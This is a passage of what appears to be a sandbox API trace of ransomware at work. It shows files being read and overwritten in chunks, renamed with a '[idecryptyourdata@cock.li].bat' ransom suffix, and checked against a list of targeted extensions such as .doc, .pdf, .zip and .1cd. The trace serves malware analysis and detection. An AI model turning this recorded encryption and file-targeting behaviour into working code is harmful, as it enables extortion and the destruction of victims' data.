(lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0048.148] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0x0) returned 1 [0048.148] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0048.148] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f14058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0048.212] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0048.212] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f54058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f54058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0048.223] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.223] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0048.223] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f94058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f94058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0049.487] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.487] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x320fca8, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fca8*=0xc0108, lpOverlapped=0x0) returned 1 [0049.501] SetEndOfFile (hFile=0x2c8) returned 1 [0049.501] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x42f10a8 [0049.505] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0049.505] WriteFile (in: hFile=0x2c8, lpBuffer=0x42f10a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x42f10a8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0049.506] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0049.506] WriteFile (in: hFile=0x2c8, lpBuffer=0x42f10a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x42f10a8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0049.507] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0049.507] WriteFile (in: hFile=0x2c8, lpBuffer=0x42f10a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x42f10a8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0049.508] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f10a8 | out: hHeap=0x5d0000) returned 1 [0049.510] CloseHandle (hObject=0x2c8) returned 1 [0057.659] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0057.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.660] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.660] lstrlenW (lpString=".doc") returned 4 [0057.660] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0057.660] lstrlenW (lpString=".docx") returned 5 [0057.660] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0057.660] lstrlenW (lpString=".pdf") returned 4 [0057.660] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0057.660] lstrlenW (lpString=".xls") returned 4 [0057.660] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0057.660] lstrlenW (lpString=".xlsx") returned 5 [0057.660] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0057.660] lstrlenW (lpString=".ppt") returned 4 [0057.660] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0057.660] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.660] lstrlenW (lpString=".zip") returned 4 [0057.660] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0057.660] lstrlenW (lpString=".rar") returned 4 [0057.660] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0057.660] lstrlenW (lpString=".bz2") returned 4 [0057.660] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0057.660] lstrlenW (lpString=".7z") returned 3 [0057.660] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0057.660] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.660] lstrlenW (lpString=".dbf") returned 4 [0057.660] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0057.660] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.660] lstrlenW (lpString=".1cd") returned 4 [0057.660] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0057.660] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.661] lstrlenW (lpString=".jpg") returned 4 [0057.661] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0057.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.661] lstrlenW (lpString=".doc") returned 4 [0057.661] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0057.661] lstrlenW (lpString=".docx") returned 5 [0057.661] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0057.661] lstrlenW (lpString=".pdf") returned 4 [0057.661] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0057.661] lstrlenW (lpString=".xls") returned 4 [0057.661] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0057.661] lstrlenW (lpString=".xlsx") returned 5 [0057.661] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0057.661] lstrlenW (lpString=".ppt") returned 4 [0057.661] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0057.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.661] lstrlenW (lpString=".zip") returned 4 [0057.661] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0057.661] lstrlenW (lpString=".rar") returned 4 [0057.661] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0057.661] lstrlenW (lpString=".bz2") returned 4 [0057.661] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0057.661] lstrlenW (lpString=".7z") returned 3 [0057.661] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0057.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.661] lstrlenW (lpString=".dbf") returned 4 [0057.661] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0057.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.662] lstrlenW (lpString=".1cd") returned 4 [0057.662] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0057.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0057.662] lstrlenW (lpString=".jpg") returned 4 [0057.662] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0057.662] lstrcmpiW (lpString1=".msu", lpString2=".bat") returned 1 [0057.662] lstrlenW (lpString="Windows6.0-KB956250-v6001-x86.msu") returned 33 [0057.662] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0057.662] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=2192672) returned 1 [0057.662] CloseHandle (hObject=0x2c8) returned 1 [0057.662] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu")) returned 0x80 [0057.662] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.663] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0057.663] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0057.663] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0x0) returned 1 [0057.663] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.663] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f14058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.668] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.668] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f54058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f54058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.670] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.670] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.671] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f94058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f94058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.697] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.697] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x320fca8, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0058.132] SetEndOfFile (hFile=0x2c8) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0058.132] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0058.132] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.133] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0058.133] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.135] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0058.135] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.136] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0058.136] CloseHandle (hObject=0x2c8) returned 1 [0058.645] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0058.646] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.646] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.646] lstrlenW (lpString=".doc") returned 4 [0058.646] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0058.646] lstrlenW (lpString=".docx") returned 5 [0058.646] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0058.646] lstrlenW (lpString=".pdf") returned 4 [0058.646] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0058.646] lstrlenW (lpString=".xls") returned 4 [0058.647] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0058.647] lstrlenW (lpString=".xlsx") returned 5 [0058.647] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0058.647] lstrlenW (lpString=".ppt") returned 4 [0058.647] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString=".zip") returned 4 [0058.647] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0058.647] lstrlenW (lpString=".rar") returned 4 [0058.647] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0058.647] lstrlenW (lpString=".bz2") returned 4 [0058.647] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0058.647] lstrlenW (lpString=".7z") returned 3 [0058.647] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString=".dbf") returned 4 [0058.647] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString=".1cd") returned 4 [0058.647] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString=".jpg") returned 4 [0058.647] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.647] lstrlenW (lpString=".doc") returned 4 [0058.647] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0058.647] lstrlenW (lpString=".docx") returned 5 [0058.648] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0058.648] lstrlenW (lpString=".pdf") returned 4 [0058.648] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0058.648] lstrlenW (lpString=".xls") returned 4 [0058.648] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0058.648] lstrlenW (lpString=".xlsx") returned 5 [0058.648] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0058.648] lstrlenW (lpString=".ppt") returned 4 [0058.648] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0058.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.648] lstrlenW (lpString=".zip") returned 4 [0058.648] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0058.648] lstrlenW (lpString=".rar") returned 4 [0058.648] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0058.648] lstrlenW (lpString=".bz2") returned 4 [0058.648] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0058.648] lstrlenW (lpString=".7z") returned 3 [0058.648] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0058.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.648] lstrlenW (lpString=".dbf") returned 4 [0058.648] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0058.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.648] lstrlenW (lpString=".1cd") returned 4 [0058.648] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0058.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0058.648] lstrlenW (lpString=".jpg") returned 4 [0058.648] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0058.649] lstrcmpiW (lpString1=".msu", lpString2=".bat") returned 1 [0058.649] lstrlenW (lpString="Windows6.1-KB958488-v6001-x86.msu") returned 33 [0058.649] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0058.649] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=2141433) returned 1 [0058.649] CloseHandle (hObject=0x2c8) returned 1 [0058.649] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu")) returned 0x80 [0058.649] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.649] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0058.650] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0058.650] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0x0) returned 1 [0058.650] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0058.650] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f14058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0058.654] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0058.654] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f54058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f54058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0058.657] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.657] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0058.657] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f94058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f94058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0059.026] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.026] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x320fca8, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0059.049] SetEndOfFile (hFile=0x2c8) returned 1 [0059.049] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0059.049] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0059.049] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0059.051] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0059.051] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0059.053] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0059.053] WriteFile (in: hFile=0x2c8, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0059.054] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0059.054] CloseHandle (hObject=0x2c8) returned 1 [0060.446] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0060.446] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.446] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.446] lstrlenW (lpString=".doc") returned 4 [0060.446] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0060.446] lstrlenW (lpString=".docx") returned 5 [0060.446] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0060.446] lstrlenW (lpString=".pdf") returned 4 [0060.446] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0060.446] lstrlenW (lpString=".xls") returned 4 [0060.446] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0060.446] lstrlenW (lpString=".xlsx") returned 5 [0060.446] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0060.446] lstrlenW (lpString=".ppt") returned 4 [0060.446] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0060.446] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString=".zip") returned 4 [0060.447] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0060.447] lstrlenW (lpString=".rar") returned 4 [0060.447] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0060.447] lstrlenW (lpString=".bz2") returned 4 [0060.447] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0060.447] lstrlenW (lpString=".7z") returned 3 [0060.447] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString=".dbf") returned 4 [0060.447] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString=".1cd") returned 4 [0060.447] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW 